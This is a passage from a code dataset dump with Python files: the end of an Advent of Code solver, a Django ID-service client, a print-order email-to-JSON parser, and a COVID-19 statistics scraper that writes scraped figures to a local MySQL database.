\"4\": next(signal for signal in input_line if len(signal) == 4),\n \"8\": next(signal for signal in input_line if len(signal) == 7)\n }\n five_length_signals = [\n signal for signal in input_line if len(signal) == 5\n ]\n six_length_signals = [\n signal for signal in input_line if len(signal) == 6\n ]\n\n for signal in six_length_signals:\n if all(\n char in signal\n for char in signal_patterns[\"4\"] + signal_patterns[\"7\"]\n ):\n signal_patterns[\"9\"] = signal\n elif all(char in signal for char in signal_patterns[\"7\"]):\n signal_patterns[\"0\"] = signal\n else:\n signal_patterns[\"6\"] = signal\n\n for signal in five_length_signals:\n missing_from_six = \"\".join(\n char for char in \"abcdefg\" if char not in signal_patterns[\"6\"]\n )\n if all(char in signal for char in signal_patterns[\"1\"]):\n signal_patterns[\"3\"] = signal\n elif missing_from_six in signal:\n signal_patterns[\"2\"] = signal\n else:\n signal_patterns[\"5\"] = signal\n value_for_signal = {\n signal: number for number, signal in signal_patterns.items()\n }\n second_solution += int(\n \"\".join([value_for_signal[output] for output in output_line])\n )\n\n print(\n f\"\"\"Day 8:\n first solution: {first_solution}\n second solution: {second_solution}\"\"\"\n )\n","repo_name":"DanielElisenberg/aoc2021","sub_path":"day08/day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43422729063","text":"from copy import copy\nfrom datetime import datetime\n\nfrom django.conf import settings\n\nimport requests\n\n\ndef get_idservice(test=False):\n if test or settings.DEBUG:\n kwargs = copy(settings.TEST_IDSERVICE) \n else:\n kwargs = copy(settings.IDSERVICE)\n return IDService(**kwargs)\n\n\ndef mintandbind(objtype, objurl='', description=''):\n idservice = get_idservice()\n data = idservice.mint(1)\n id = data['identifier']\n idservice.bind(id=id, objurl=objurl, objtype=objtype, desc=description)\n return id\n\n\nclass IDService():\n\n def __init__(self, requester, minter, url, port=80):\n self.minter = minter\n self.url = url if url.startswith('http') else 'http://%s' % url\n self.port = port\n if port != 80:\n self.baseurl = '%s:%s' % (url, port)\n else:\n self.baseurl = url\n\n def __str__(self):\n return '' % (self.minter, self.url)\n\n def mint(self, quantity=1):\n url = '%s/mint/%s/%s' % (self.baseurl, self.minter, quantity)\n response = requests.get(url)\n if response.status_code != 200:\n raise self.IDServiceError(response.text)\n data = response.json()\n if quantity==1: data = data[0]\n return data\n\n def bind(self, id, objurl, objtype='', desc=''):\n url = '%s/bind/%s' % (self.baseurl, id)\n params = {'object_url': objurl, 'object_type': objtype,\n 'description': desc}\n response = requests.get(url, params=params)\n if response.status_code != 200:\n raise self.IDServiceError(response.text)\n return response.json()[0]\n\n def lookup(self, id):\n url = '%s/lookup/%s' % (self.baseurl, id)\n response = requests.get(url)\n if response.status_code != 200:\n raise self.IDServiceError(response.text)\n return response.json()[0]\n\n class IDServiceError(Exception):\n\n def __init__(self, msg):\n self.msg = msg\n\n def __repr__(self):\n return self.msg\n","repo_name":"gwu-libraries/inventory_old","sub_path":"inv/invapp/idservice.py","file_name":"idservice.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"13158364893","text":"# jsonData.py\n__version__ = \"v20200801\"\n# Built-In Libraries\nimport json\nimport os\nimport glob\nfrom datetime import datetime\n# Downloaded Libraries\nimport PyPDF2\n# Local Files\nimport files\nimport PostScript\nimport order as o\nimport log\n\n\ndef json_data(order):\n \"\"\"\n Generates the JSON/DICT for the current order.\n\n Parameters: \n order (object): The object containing all the information for the current order.\n\n Returns: \n json/dict: The JSON/DICT for the order.\n \"\"\"\n json_Data = {'Account ID': 'CHANGE ME'}\n json_Data[\"Order Number\"] = order.NUMBER\n json_Data[\"Order Subject\"] = order.SUBJECT\n FILES = files.file_list(order)\n # Imports the Email contents line by line.\n email = []\n with open(\"\".join([order.OD, '/', order.NAME, '/', order.NAME, \".txt\"]), \"r\") as f:\n for line in f.readlines():\n email.append(line.rstrip('\\n'))\n json_Data[\"Email ID\"] = email[0][2:]\n json_Data[\"Files\"] = {}\n # This gets the number of pages for every pdf file for the job.\n for i in range(len(FILES)):\n try:\n f = open('/'.join([order.OD, order.NAME, FILES[i]]), \"rb\")\n pdf = PyPDF2.PdfFileReader(f)\n json_Data[\"Files\"][\"\".join([\"File \", str(\n i+1)])] = {\"File Name\": FILES[i], \"Page Count\": str(pdf.getNumPages())}\n f.close()\n except:\n log.logger.exception(\"Using Alternative Page Count Source\")\n pdf = files.page_count(\n '/'.join([order.OD, order.NAME, FILES[i]]))\n json_Data[\"Files\"][\"\".join([\"File \", str(\n i+1)])] = {\"File Name\": FILES[i], \"Page Count\": str(pdf)}\n # Removes the duplicate portion of the email that contains html (form) code.\n for i in range(len(email)):\n if \"IF YOU HAVE ANY QUESTIONS\" in email[i]:\n email = email[8:-(len(email)-i)]\n break\n # Searchs for required elements from the form for the JSON file.\n for i in range(len(email)):\n test_string = \"Timestamp\"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Date Ordered\"] = line[1]\n test_string = \"*Timestamp: *\"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Date Ordered\"] = line[1]\n test_string = \"Email address \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Email\"] = line[1]\n test_string = \"Your Last Name \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Last Name\"] = line[1]\n test_string = \"Your First Name \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"First Name\"] = line[1]\n test_string = \"Your Call Back Number \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Phone Number\"] = line[1]\n test_string = \"Your building \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Building\"] = line[1]\n test_string = \"Number of Copies Needed per File \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Copies\"] = line[1]\n test_string = \"Printing Setup \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Duplex\"] = line[1]\n test_string = \"Collated or Uncollated \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Collation\"] = line[1]\n test_string = \"Paper Size, Type, and Color \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Paper\"] = line[1].replace(\"=E2=80=93 \", \"\")\n test_string = \"Stapling \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Stapling\"] = line[1]\n test_string = \"Drilling - Three Hole Punch \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Drilling\"] = line[1]\n test_string = \"Folding \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Folding\"] = line[1]\n test_string = \"Cutting \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Cutting\"] = line[1]\n test_string = \"Slip Sheets and/or Shrink Wrap \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n extra = \"\"\n j = 1\n while(not (\"Special Instructions \" in email[i+j] or \"Deliver to: \" in email[i+j])):\n extra = \"\".join([\" \", extra, \" \", email[i+j]])\n j += 1\n json_Data[\"Slip Sheets / Shrink Wrap\"] = \"\".join(\n [line[1], extra])\n test_string = \"Special Instructions \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n extra = \"\"\n j = 1\n while(not(\"Deliver to: \" in email[i+j])):\n extra = \"\".join([\" \", extra, \" \", email[i+j]])\n j += 1\n json_Data[\"Special Instructions\"] = \"\".join([line[1], extra])\n test_string = \"Booklet Fold and Staple \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Booklets\"] = line[1]\n test_string = \"Front Cover \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Front Cover\"] = line[1].replace(\"=E2=80=93 \", \"\")\n test_string = \"Back Cover \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Back Cover\"] = line[1].replace(\"=E2=80=93 \", \"\")\n test_string = \"Deliver to: (Staff Member's Name) \"\n if test_string in email[i]:\n line = email[i].split(test_string)\n json_Data[\"Deliver To Name\"] = line[1]\n test_string = \"Deliver To:\"\n if test_string in email[i]:\n line = email[i].split(test_string)\n line2 = \"\"\n if (\"@\" not in email[i+1]):\n if len(email[i+1]) == 5:\n line2 = \" \" + email[i+1]\n else:\n line2 = email[i+1]\n json_Data[\"Deliver To Address\"] = (line[1].replace(\n \"=\", \"\").strip() + line2).strip()\n json_Data[\"Status\"] = order.status = \"NotStarted\"\n json_Data[\"Cost\"] = order.COST = 0\n # Creates the JSON file\n with open(\"\".join([order.OD, '/', order.NAME, '/', order.NAME, '.json']), 'w') as outfile:\n json.dump(json_Data, outfile, indent=4, separators=(',', ': '))\n return json_Data\n\n\ndef orderStatusExport(order, STATUS, DATE):\n \"\"\"\n Exports the Status of the order with the date time.\n\n Puts in the JSON file wether the Ticker or the Order has been printed.\n\n Parameters: \n order (object): The object containing all the information for the current order.\n STATUS (str) : The status of the order.\n DATE (str) : The Date which it was modified.\n\n Returns: \n void: Unused Return\n \"\"\"\n JSON_PATH = \"\".join(\n [order.OD, '/', order.NAME, '/', order.NAME, '.json'])\n with open(JSON_PATH) as json_file:\n JOB_INFO = json.load(json_file)\n now = datetime.now()\n current_time = \"\"\n if(DATE):\n current_time = \"_\" + now.strftime(\"%Y%m%d:%H%M\")\n order.status = STATUS + current_time\n JOB_INFO[\"Status\"] = order.status\n with open(JSON_PATH, 'w') as outfile:\n json.dump(JOB_INFO, outfile, indent=4, separators=(',', ': '))\n\n\ndef main(OUTPUT_DIRECTORY):\n log.logInit(\"JSON\")\n print = log.Print\n input = log.Input\n Start = str(input(\"Start #: \"))\n End = str(input(\"End #: \"))\n folders = files.folder_list(OUTPUT_DIRECTORY)\n ORDER_NAMES = []\n for ORDER_NUMBER in range(int(Start), int(End)+1):\n ORDER_NUMBER = str(ORDER_NUMBER).zfill(5)\n for i in folders: # Searchs for Requested Order Number from list of currently downloaded orders\n if ORDER_NUMBER in i:\n ORDER_NAMES.append(i)\n for ORDER_NAME in ORDER_NAMES:\n print(ORDER_NAME)\n order = o.Order()\n order.NAME = ORDER_NAME\n order.NUMBER = ORDER_NAME[:10]\n order.SUBJECT = ORDER_NAME[11:]\n order.OD = OUTPUT_DIRECTORY\n json_data(order)\n\n\nif __name__ == \"__main__\":\n main(\"SO/\")\n","repo_name":"ArthurVardevanyan/CPD_SO_Automated_Printing","sub_path":"jsonData.py","file_name":"jsonData.py","file_ext":"py","file_size_in_byte":8678,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15975615340","text":"# -*- coding: utf-8 -*-\nimport time,datetime, json, requests,pymysql\nimport pandas as pd\nimport traceback\nfrom selenium.webdriver import Chrome, ChromeOptions\nimport sys\n\n# ----------------数据库连接、关闭------------------------\n#连接数据库\ndef get_conn():\n #建立连接\n connect = pymysql.Connect(\n host='localhost',\n port=3306,\n user='root',\n passwd='123456',\n db='cov',\n charset='utf8'\n )\n #获取游标\n cursor = connect.cursor()\n return connect,cursor\n\n#关闭连接\ndef close_conn(connect,cursor):\n if connect:\n connect.close()\n if cursor:\n cursor.close()\n\n# ----------------爬取数据------------------------\n\n# 抓取腾讯疫情国内每日实时详细各省市和中国每日历史数据\ndef get_tencent_data():\n url1 = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_h5&callback=&_=%d'%int(time.time()*1000)\n url2 = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_other&callback=&_=%d'%int(time.time()*1000)\n headers = {\n 'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n r1 = requests.get(url1, headers)\n r2 = requests.get(url2, headers)\n\n #json字符串转字典\n res1 = json.loads(r1.text)\n res2 = json.loads(r2.text)\n\n data_all1 = json.loads(res1[\"data\"])\n data_all2 = json.loads(res2[\"data\"])\n\n #当日详细数据\n details = []\n update_time = data_all1[\"lastUpdateTime\"]\n data_country = data_all1[\"areaTree\"]\n data_province = data_country[0][\"children\"]\n for pro_infos in data_province:\n province = pro_infos[\"name\"]\n for city_infos in pro_infos[\"children\"]:\n city = city_infos[\"name\"]\n confirm = city_infos[\"total\"][\"confirm\"]\n confirm_add = city_infos[\"today\"][\"confirm\"]\n nowConfirm = city_infos['total']['nowConfirm']\n suspect = city_infos[\"total\"][\"suspect\"]\n heal = city_infos[\"total\"][\"heal\"]\n dead = city_infos[\"total\"][\"dead\"]\n dead_rate = city_infos['total']['deadRate']\n heal_rate = city_infos['total']['healRate']\n details.append([update_time, province, city,nowConfirm, confirm, confirm_add, suspect,heal, dead,dead_rate,heal_rate])\n\n #历史数据\n history = {}\n for day_infos in data_all2[\"chinaDayList\"]:\n ds = day_infos[\"y\"]+\".\"+day_infos[\"date\"]\n tup = time.strptime(ds, \"%Y.%m.%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup) #改变时间输入格式,不然插入数据库会报错,数据库是datatime格式\n confirm = day_infos[\"confirm\"]\n suspect = day_infos[\"suspect\"]\n heal = day_infos[\"heal\"]\n dead = day_infos[\"dead\"]\n nowConfirm = day_infos[\"nowConfirm\"]\n nowSevere = day_infos[\"nowSevere\"]\n importedCase = day_infos[\"importedCase\"]\n noInfect = day_infos[\"noInfect\"]\n localConfirm = day_infos[\"localConfirm\"]\n dead_rate = day_infos[\"deadRate\"]\n heal_rate = day_infos[\"healRate\"]\n history[ds] = {\"confirm\":confirm, \"suspect\":suspect, \"heal\":heal, \"dead\":dead,\n \"importedCase\": importedCase, \"noInfect\": noInfect, \"localConfirm\":localConfirm, \"nowConfirm\":nowConfirm,\n \"nowSevere\":nowSevere, \"dead_rate\":dead_rate, \"heal_rate\":heal_rate}\n for day_infos in data_all2[\"chinaDayAddList\"]:\n ds = day_infos[\"y\"]+\".\"+day_infos[\"date\"]\n tup = time.strptime(ds, \"%Y.%m.%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup) #改变时间输入格式,不然插入数据库会报错,数据库是datatime格式\n confirm = day_infos[\"confirm\"]\n suspect = day_infos[\"suspect\"]\n heal = day_infos[\"heal\"]\n dead = day_infos[\"dead\"]\n importedCase = day_infos[\"importedCase\"]\n noInfect = day_infos[\"infect\"]\n dead_rate = day_infos[\"deadRate\"]\n heal_rate = day_infos[\"healRate\"]\n localConfirm = day_infos[\"localConfirmadd\"]\n history[ds].update({\"confirm_add\":confirm, \"suspect_add\":suspect, \"heal_add\":heal, \"dead_add\":dead,\n \"importedCase_add\": importedCase, \"noInfect_add\": noInfect, \"localConfirm_add\":localConfirm,\n \"dead_rate_add\":dead_rate, \"heal_rate_add\":heal_rate})\n return history,details\n\n# 抓取各省从2020到2021的每日历史数据(无市区)\ndef get_province_history_data():\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36\"\n }\n url = \"http://111.231.75.86:8000/api/provinces/CHN/daily/\"\n\n response = requests.get(url=url, headers=headers)\n res = json.loads(response.text)\n details = []\n for infos in res:\n ds = datetime.datetime.strptime(str(infos[\"dateId\"]), '%Y%m%d').strftime('%Y-%m-%d')\n province = infos[\"provinceName\"]\n province_code = infos[\"provinceCode\"]\n nowConfirm = infos[\"currentConfirmedCount\"]\n nowConfirm_add = infos[\"currentConfirmedIncr\"]\n confirm = infos[\"confirmedCount\"]\n confirm_add = infos[\"confirmedIncr\"]\n suspect = infos[\"suspectedCount\"]\n suspect_add = infos[\"suspectedCountIncr\"]\n heal = infos[\"curedCount\"]\n dead = infos[\"deadCount\"]\n heal_add = infos[\"curedIncr\"]\n dead_add = infos[\"deadIncr\"]\n nowSevere = infos[\"highDangerCount\"]\n nowMidSevere = infos[\"midDangerCount\"]\n details.append(\n [ds, province,province_code, confirm, confirm_add, nowConfirm, nowConfirm_add, suspect, suspect_add, heal, heal_add, dead, dead_add, nowSevere, nowMidSevere])\n\n return details\n\n\n# 抓取本土风险划分数据\ndef get_localrisk_data():\n url = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_other&callback=&_=%d' % int(time.time() * 1000)\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n r = requests.get(url, headers)\n res = json.loads(r.text)\n data_all = json.loads(res[\"data\"])\n locallist = []\n for local in data_all[\"statisGradeCityDetail\"]:\n ds = str(local[\"syear\"]) + \"/\" + local[\"date\"]\n tup = time.strptime(ds, \"%Y/%m/%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup) # 改变时间输入格式,不然插入数据库会报错,数据库是datatime格式\n province = local[\"province\"]\n city = local[\"city\"]\n nowConfirm = local[\"nowConfirm\"]\n confirm = local[\"confirm\"]\n confirm_add = local[\"confirmAdd\"]\n heal = local[\"heal\"]\n dead = local[\"dead\"]\n grade = local[\"grade\"]\n locallist.append([ds, province,city,nowConfirm,confirm,confirm_add,heal,dead,grade])\n return locallist\n\n#抓取全球各国以及美国各洲最新的数据\ndef get_global_country_latest_data():\n url = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_foreign&callback=&_=%d' % int(time.time() * 1000)\n url2 = \"https://api.inews.qq.com/newsqa/v1/automation/foreign/country/ranklist\"\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n s = requests.session()\n s.keep_alive = False\n requests.DEFAULT_RETRIES = 5\n\n # 各国各城市数据\n details = []\n america = []\n\n #获取美国数据\n r1 = requests.get(url, headers)\n res1 = json.loads(r1.text)\n data_all = json.loads(res1[\"data\"])\n\n # 获取全球数据\n r2 = requests.post(url=url2, headers=headers)\n res2 = json.loads(r2.text)\n # print(res[\"data\"])\n for infos in res2[\"data\"]:\n ds = infos[\"y\"] + \".\" + infos[\"date\"]\n country = infos[\"name\"]\n continent = infos[\"continent\"]\n nowConfirm = infos[\"nowConfirm\"]\n nowConfirm_add = infos[\"nowConfirmCompare\"]\n confirm = infos[\"confirm\"]\n confirm_add = infos[\"confirmCompare\"]\n suspect = infos[\"suspect\"]\n heal = infos[\"heal\"]\n dead = infos[\"dead\"]\n heal_add = infos[\"healCompare\"]\n dead_add = infos[\"deadCompare\"]\n tup = time.strptime(ds, \"%Y.%m.%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup)\n details.append([ds,country, continent, confirm, confirm_add,nowConfirm,nowConfirm_add, suspect,\n heal, heal_add, dead, dead_add])\n\n # 美国数据\n for infos in data_all[\"foreignList\"]:\n name = infos[\"name\"]\n continent = infos[\"continent\"]\n nowConfirm = infos[\"nowConfirm\"]\n confirm = infos[\"confirm\"]\n confirm_add = infos[\"confirmAdd\"]\n suspect = infos[\"suspect\"]\n heal = infos[\"heal\"]\n dead = infos[\"dead\"]\n confirm_cmp = infos[\"confirmCompare\"]\n nowConfirm_cmp = infos[\"nowConfirmCompare\"]\n heal_cmp = infos[\"healCompare\"]\n dead_cmp = infos[\"deadCompare\"]\n if (infos[\"name\"] == \"美国\"):\n ds = infos[\"y\"] +\".\" + infos[\"date\"]\n tup = time.strptime(ds, \"%Y.%m.%d\") # 匹配时间\n ds = time.strftime(\"%Y-%m-%d\", tup)\n for i in infos[\"children\"]:\n city = i[\"name\"]\n citymap = i[\"nameMap\"]\n cconfirm = i[\"confirm\"]\n cconfirm_add = i[\"confirmAdd\"]\n csuspect = i[\"suspect\"]\n cheal = i[\"heal\"]\n cdead = i[\"dead\"]\n america.append([ds, name, city, citymap, cconfirm, cconfirm_add, csuspect, cheal, cdead])\n break\n\n return america,details\n\n#抓取全球各国历史数据(文件)\ndef get_global_country_history_data():\n try:\n details = []\n with open('./static/json/world-country-history.json','rb') as f:\n jsonStr = json.load(f)\n for infos in jsonStr:\n ds = datetime.datetime.strptime(str(infos[\"dateId\"]), '%Y%m%d').strftime('%Y-%m-%d')\n country = infos[\"countryName\"]\n country_code = infos[\"countryCode\"]\n nowConfirm = infos[\"currentConfirmedCount\"]\n nowConfirm_add = infos[\"currentConfirmedIncr\"]\n confirm = infos[\"confirmedCount\"]\n confirm_add = infos[\"confirmedIncr\"]\n suspect = infos[\"suspectedCount\"]\n suspect_add = infos[\"suspectedCountIncr\"]\n heal = infos[\"curedCount\"]\n dead = infos[\"deadCount\"]\n heal_add = infos[\"curedIncr\"]\n dead_add = infos[\"deadIncr\"]\n details.append(\n [ds, country,country_code, confirm, confirm_add, nowConfirm, nowConfirm_add, suspect, suspect_add, heal, heal_add,\n dead, dead_add])\n f.close()\n return details\n except Exception as e:\n print(e)\n\n# 获取美国各州历史数据\ndef get_america_state_history_data():\n try:\n details = []\n with open('./static/json/america-provinces-history.json','rb') as f:\n jsonStr = json.load(f)\n name = '美国'\n for infos in jsonStr:\n ds = datetime.datetime.strptime(str(infos[\"dateId\"]), '%Y%m%d').strftime('%Y-%m-%d')\n city = infos[\"provinceName\"]\n citymap = infos[\"provinceCode\"]\n confirm = infos[\"confirmedCount\"]\n confirm_add = infos[\"confirmedIncr\"]\n suspect = infos[\"suspectedCount\"]\n heal = infos[\"curedCount\"]\n dead = infos[\"deadCount\"]\n if(suspect == None): suspect = 0\n if(heal == None): heal = 0\n if(dead == None): dead = 0\n if(confirm == None): confirm =0\n if (confirm_add == None): confirm_add = 0\n details.append([ds, name, city, citymap, confirm, confirm_add, suspect, heal, dead])\n f.close()\n return details\n except Exception as e:\n print(e)\n\n# 获取美国历史总体数据\ndef get_america_history_data():\n try:\n details = []\n with open('./static/json/america-history.json','rb') as f:\n jsonStr = json.load(f)\n name = '美国'\n for infos in jsonStr:\n ds = datetime.datetime.strptime(str(infos[\"date\"]), '%Y%m%d').strftime('%Y-%m-%d')\n confirm = infos[\"positive\"] # 阳性累计\n confirm_add = infos[\"positiveIncrease\"] # 阳性新增\n suspect = 0\n heal = infos[\"recovered\"]\n dead = infos[\"death\"]\n dead_add = infos[\"deathIncrease\"]\n hospitalized = infos[\"hospitalized\"] #住院累计\n nowHospitalized = infos[\"hospitalizedCurrently\"] #当前住院 现有住院\n hospitalized_add = infos[\"hospitalizedIncrease\"] #住院新增\n nowInIcu = infos[\"inIcuCurrently\"] # 当前ICU\n inIcu = infos[\"inIcuCumulative\"] # 累计ICU\n negative = infos[\"negative\"] # 阴性检测累计\n negative_add = infos['negativeIncrease']\n onVentilator = infos['onVentilatorCumulative'] #使用呼吸机累计\n nowOnVentilator = infos['onVentilatorCurrently'] #当前使用呼吸机\n totalTestResults = infos['totalTestResults'] #累计监测\n totalTestResults_add = infos['totalTestResultsIncrease']\n if(onVentilator == None): onVentilator = 0\n if(nowOnVentilator == None): nowOnVentilator = 0\n if(nowHospitalized == None): nowHospitalized = 0\n if(hospitalized == None): hospitalized = 0\n if(hospitalized_add == None): hospitalized_add = 0\n if(heal == None): heal = 0\n if(dead == None): dead = 0\n if(confirm == None): confirm =0\n if (confirm_add == None): confirm_add = 0\n if (nowInIcu == None): nowInIcu = 0\n if (inIcu == None): inIcu = 0\n if (negative == None): negative = 0\n details.append([ds, confirm, confirm_add, suspect, heal, dead, dead_add, negative,negative_add,hospitalized, hospitalized_add, nowHospitalized,\n inIcu, nowInIcu, onVentilator,nowOnVentilator,totalTestResults,totalTestResults_add])\n f.close()\n return details\n except Exception as e:\n print(e)\n\n#抓取全球历史总体数据\ndef get_global_histroy_data():\n url = \"https://api.inews.qq.com/newsqa/v1/automation/modules/list?modules=FAutoGlobalStatis,FAutoGlobalDailyList\"\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36\"\n }\n response = requests.get(url=url, headers=headers)\n res = json.loads(response.text)\n data = res[\"data\"]\n\n global_day_list = data['FAutoGlobalDailyList']\n global_statis = data['FAutoGlobalStatis']\n global_history = {}\n for global_day in global_day_list:\n ds = global_day[\"y\"] + \".\" + global_day[\"date\"]\n confirm = global_day[\"all\"][\"confirm\"]\n dead = global_day[\"all\"][\"dead\"]\n heal = global_day[\"all\"][\"heal\"]\n confirm_add = global_day[\"all\"][\"newAddConfirm\"]\n dead_rate = global_day[\"all\"][\"deadRate\"]\n heal_rate = global_day[\"all\"][\"healRate\"]\n global_history[ds] = {\"confirm\": confirm, \"confirm_add\": confirm_add, \"dead\": dead, \"heal\": heal,\n \"dead_rate\": dead_rate, \"heal_rate\": heal_rate}\n\n ds = global_statis[\"lastUpdateTime\"]\n confirm = int(global_statis[\"confirm\"])\n dead = int(global_statis[\"dead\"])\n heal = int(global_statis[\"heal\"])\n dead_rate = round(dead / confirm, 4) if confirm > 0 else 0.00\n heal_rate = round(heal / confirm, 4) if confirm > 0 else 0.00\n global_history[ds] = {\"confirm\": confirm,\n \"confirm_add\": global_statis[\"nowConfirmAdd\"],\n \"dead\": dead,\n \"heal\": heal,\n \"dead_rate\": dead_rate,\n \"heal_rate\": heal_rate}\n global_statis_list = [global_statis[key] for key in global_statis]\n\n return global_history, global_statis_list\n\n# 热搜新闻数据\ndef get_hotnews_data():\n url = \"https://voice.baidu.com/act/newpneumonia/newpneumonia/\"\n # 无头模式,无需打开浏览器,效率快\n option = ChromeOptions()\n # 隐藏浏览器\n option.add_argument(\"--headless\")\n # linux部署\n option.add_argument(\"--no-sandbox\")\n browser = Chrome(options = option)\n browser.get(url)\n # 整个网站的源码\n # print(browser.page_source)\n # 模拟按钮模仿人浏览网站点击展开\n but = browser.find_element_by_xpath('//*[@id=\"ptab-1\"]/div[3]/div[11]/span')\n # but = browser.find_element_by_css_selector('#ptab-1 > div.Virus_1-1-304_2SKAfr > div.Common_1-1-304_3lDRV2 > span')\n\n # 模拟点击按钮,点击展开\n but.click()\n # 等待1秒\n time.sleep(1)\n #获取热搜头条信息\n content = []\n link = []\n news = browser.find_elements_by_xpath('//*[@id=\"ptab-1\"]/div[3]/div/div[2]/a/div')\n a = browser.find_elements_by_xpath('//*[@id=\"ptab-1\"]/div[3]/div/div[2]/a')\n\n for i, j in zip(news, a):\n # 热搜头条标题\n content.append(i.text)\n link.append(j.get_attribute(\"href\"))\n\n # 关闭浏览\n browser.close()\n return content,link\n\n\n# ----------------爬取数据结束------------------------\n\n# ----------------更新国内数据start------------------------\n#更新国内疫情详细数据\ndef update_details():\n cursor = None\n connect = None\n try:\n li = get_tencent_data()[1] #0历史,1当前数据\n connect,cursor = get_conn()\n sql = \"INSERT INTO details (update_time, province, city, nowConfirm, confirm, confirm_add,suspect, heal, dead, dead_rate, heal_rate) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n sql_query = \"select %s = (select update_time from details order by id desc limit 1)\"\n # 对比当前最大时间戳,相同不更新,不相同则更新\n cursor.execute(sql_query, li[0][0])\n if not cursor.fetchone()[0]:\n #time.asctime() 接受时间元组并返回一个可读的形式为\"Tue Dec 11 18:07:14 2008\"\n # 以 f开头表示在字符串内支持大括号内的python 表达式\n print(f\"{time.asctime()}开始更新数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() #提交事务\n print(f\"{time.asctime()}更新到最新数据\")\n else:\n print(f\"{time.asctime()}已是最新数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect,cursor)\n\n#更新国内各省疫情历史每日数据\ndef update_province_history_data():\n cursor = None\n connect = None\n try:\n li = get_province_history_data() #0历史,1当前数据\n connect,cursor = get_conn()\n sql = \"INSERT INTO province_history (ds, province,province_code, confirm, confirm_add, nowConfirm, nowConfirm_add, suspect, suspect_add, heal, heal_add, dead, dead_add, nowSevere, nowMidSevere) \" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n sql_query = \"select confirm from province_history where ds = %s and province = %s\"\n # sql_query = \"select %s = (select ds from province_history order by id desc limit 1)\"\n # 对比当前最大时间戳,相同不更新,不相同则更新\n print(f\"{time.asctime()}开始更新各省历史数据\")\n for item in li:\n if not cursor.execute(sql_query, [item[0],item[1]]):\n print(item)\n cursor.execute(sql, item)\n connect.commit() #提交事务\n print(f\"{time.asctime()}已更新到最新各省历史数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect,cursor)\n\n\n# 插入国内history数据\ndef insert_china_history():\n cursor = None\n connect = None\n try:\n dic = get_tencent_data()[0] #0历史数据\n print(f\"{time.asctime()}开始插入历史数据\")\n connect,cursor = get_conn()\n sql = \"insert into china_history values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n for k, v in dic.items():\n print(\"\\n\")\n print(k)\n print(\"----\")\n print(v)\n print(\"\\n\")\n cursor.execute(sql, [k,v.get(\"confirm\"), v.get(\"confirm_add\"), v.get(\"suspect\"), v.get(\"suspect_add\"),\n v.get(\"heal\"), v.get(\"heal_add\"), v.get(\"dead\"), v.get(\"dead_add\"), v.get(\"importedCase\"),\n v.get(\"importedCase_add\"), v.get(\"noInfect\"), v.get(\"noInfect_add\"), v.get(\"localConfirm\"),\n v.get(\"localConfirm_add\"), v.get(\"nowConfirm\"), v.get(\"nowSevere\"),v.get(\"dead_rate\"),\n v.get(\"heal_rate\"),v.get(\"dead_rate_add\"),v.get(\"heal_rate_add\")])\n connect.commit()\n print(f\"{time.asctime()}插入历史数据完毕\")\n except:\n traceback.print_exc()\n finally:\n 